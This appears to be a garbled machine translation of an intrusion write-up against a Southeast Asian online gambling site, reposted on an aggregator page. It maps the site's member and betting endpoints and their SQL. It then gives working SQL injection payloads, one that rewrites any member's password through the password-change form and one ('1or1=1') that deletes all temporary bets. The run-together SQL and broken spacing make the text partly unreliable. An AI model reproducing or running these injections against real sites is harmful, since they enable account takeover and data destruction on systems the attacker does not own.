A penetration into a station in Southeast Asia

Source: Internet
Author: User
# After login, the UID is reassigned and the user name and password are also passed.
It is estimated that there will be a data table dedicated to storing the data.
# Possible data table structure:
Createtableloginuid (
Uidchar (16 ),
Idinteger,
Usernamevarchar (30 ),
Timedatetime
);

/APP/member/chk_rule.php? Mtype = & uid = 1c2c91396a7f1966
# Mtype does not seem to be a required parameter, and does not play any role.
#ProgramQuery uid. If it is illegal, return to the home page

/APP/member/ft_header.php? Uid = 1c2c91396a7f1966 & showtype = & mtype = 3
# Display the top menu. The following parameters are not required, including uid

/APP/member/select. php? Uid = 1c2c91396a7f1966 & mtype = 3
# The leftmost user information area. The UID must be valid.

Football

/APP/member/ft_index.php? Uid = 1c2c91396a7f1966 & langx = ZH-tw & mtype = 3
# After Entering, football is displayed by default. mtype does not seem to have any effect.

/APP/member/ft_browse/index. php? Uid = 1c2c91396a7f1966
# Single-field Rtype = r

/JS/ft_mem_showgame.js
# This seems to be a bet, used to generate a page in the left Information bar
/APP/member/ft_browse/body_var.php
# It is actually an HTML that generates arrays and is useful for future research.
/APP/member/ft_browse/body_browse.php? Uid = 109dc631978b8b0 & Rtype = r
# Displays the information of a single field, but it seems that uid is not required

# Go to the ground: Same as a single field, only Rtype = Re
# Boldlike: Just like a single game, just Rtype = Pd
# AUTUMN: Rtype = T

# Standard pass (Rtype = P) and pass (Rtype = Pr)

Bet:
/APP/member/ft_order/ft_order_m.php? Gid = 843 & uid = 2017dc631978b8b0 & type = H & gnum = 301
# Create a betting page
# GID and gnum are defined in the body_var array.

/APP/member/ft_order/ft_order_m.php
# Handling betting Information
# Post:

Gold = 60 & uid = 109dc631978b8b0 & active = 1 & line_type = 3 & gid = 843 & type = C & gnum =
301 & concede_h = 1 & radio_h = 100 & ioradio_r_h = 6.60 & gmax_single = 30000 & gmin _
Single = 50 & singlecredit = 1000 & singleorder = 500 & restsinglecredit =
0 & wagerstotal = 1000 & restcredit = 1000 & pay_type = 0

# SQL: selectfl, FID, posfromft_followwheregid = '$ gid'
# SQL: Select * fromft_paramwhereltype = $ line_typeandgid = $ gidandrtype = '$ Rtype'
# SQL: insertintowagersou (gtype, wtype, CID, Sid, aid, mid,
Code, code_value, pay_type, winloss_s,
Winloss_a, gold, gold_d, GID, gnum, strong, type, concede, ratio, ioratio, result,
Orderdate, adddate, wingold, wratio_c, wratio_s, wratio_a, wratio_m, wgold_c,
Wgold_s, wgold_a, wgold_m) values ('ft ', 'M', '7', '26', '123456',' RMB ', '1 ',
'0', '000000', '30', '$ gold', '5. 00', '$ gid',' $ gnum ', '', 'C', '1', '000000',' $ ioradio_r
_ H ', '0', '2017-03-10', '2017-03-100', '0', '95', '95 ',
'95', '000000', '0', '0', '0', '0 ')

/APP/member/ft_order/ft_order_p.php
# Generate a temporary bet
# Post:

Game_id1 = 844 & game1 = H & game_id2 = 846 & game2 = H & game_id3 = 847 & game3 =
H & game_id4 = 848 & game_id5 = 849 & game_id6 = 845 & game_id7 = 850 & teamcount =
7 & active = 1 & uid = 6defa21b702a5d87 & team0310 = % C8 % B7 % C8 % cf

# SQL: selectfl, FID, posfromft_followwheregid = '$ game_id1'
# SQL: selectioratiofromft_paramwheregid = '000000' andrtype ='m $ game1'

/APP/member/ft_order/ft_order_pr.php? Active = 3 & uid =
Export dc631978b8b0 & tmp_id = 76507 & pdate =
# Delete a temporary bet. Note tmp_id.

# SQL: deletefromwagers_tmpwhereid = $ tmp_id

/APP/member/ft_order/ft_order_pr_finish.php
# Handle multiple bets
# Post:

Wkind = S & wstar = 3 & Gold = 50 & uid = 109dc631978b8b0 & active = 1 & teamcount =
3 & amp; username = caa1307 & amp; singlecredit = 1000 & amp; singleorder = 500 & amp; gmin_single =
50 & gmax_single = 500 & restcredit = 854 & wagerstotal =
0 & pay_type = 0 & SC = 0 + 0 + 0 + & pdate = 2004-03-10

# SQL: selectid, gold, code_valuefromwagerspwheremid = login and
Star = $ teamcountandrtype = 'pr' andgtype = 'ft'

/APP/member/result. php? Game_type = ft & uid = 109dc631978b8b0
# Competition Results
# Post: game_type = ft & today = 2004-03-10 & submit = % B2 % E9 % D1 % af
# SQL: selectid, name_c, name_g, name_efrom $ game_type_leagues
# SQL: Select * from $ game_typewhereleague_id = '000000' anddate = '$ today'
Andgame_over = 'y' orderbynum _ c

Member information:
/APP/member/account/mem_data.php? Uid = 109dc631978b8b0
# Member information, uid must be valid

/APP/member/account/chg_passwd.php? Uid = 109dc631978b8b0
# Change Password

/APP/member/account/chg_passwd.php? Uid = 109dc631978b8b0
# Process password information when action = 1
# Post: Password = ice3y3 & Action = 1 & uid = 109dc631978b8b0
# SQL: updatememberssetpassword = PASSWORD ('$ password '),
Passwd = '$ password' whereid = '000000'
# Note: Members. Password is the encrypted password, passwd is the plaintext, and ID is calculated based on the UID.

# Structure: updatememberssetpassword = PASSWORD ('$ password '),
Passwd = '$ password' whereid = '000000'

**************************************** ************

Program Analysis:

Login:
# SQL: selectid, username, typefrommemberswhereusername = '$ username'
Andpassword = PASSWORD ('$ password') and 'enabled' = 'y'

It verifies members. Password, which is the encrypted password field, rather than the plaintext password field.
So we only need to modify members. Password to change the password.
Via/APP/member/account/chg_passwd.php? Uid = 109dc631978b8b0 modify
# SQL: updatememberssetpassword = PASSWORD ('$ password'), passwd ='
$ Password 'whereid = '000000'
# Because 'is replaced with \' and \ is replaced with \, the password we modified must contain \ characters.
# $ Password = newpwd ') whereid = ID /*
# After system processing, it will eventually become: $ Password = newpwd \ ') whereid = ID /*
# Import SQL:
# SQL: updatememberssetpassword = PASSWORD ('newpwd \\')
Whereid = ID/* '), passwd = 'newpwd \') whereid = ID/* 'whereid = '000000'
# Equivalent to SQL: updatememberssetpassword = PASSWORD ('newpwd \ ') whereid = ID
# The ID can be any number.

Delete temporary bets:
/APP/member/ft_order/ft_order_pr.php? Active = 3 & uid = 109dc631978b8b0 & tmp_id
= 76507 & pdate =
# Delete a temporary bet. Note tmp_id.
# SQL: deletefromwagers_tmpwhereid = $ tmp_id
# $ Tmp_id = 1or1 = 1 /*
# SQL: deletefromwagers_tmpwhereid = 1or1 = 1
# Result: All temporary bets are deleted.

//////////////////////////////////////// ///// All rights reserved for iceeye, please refer

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.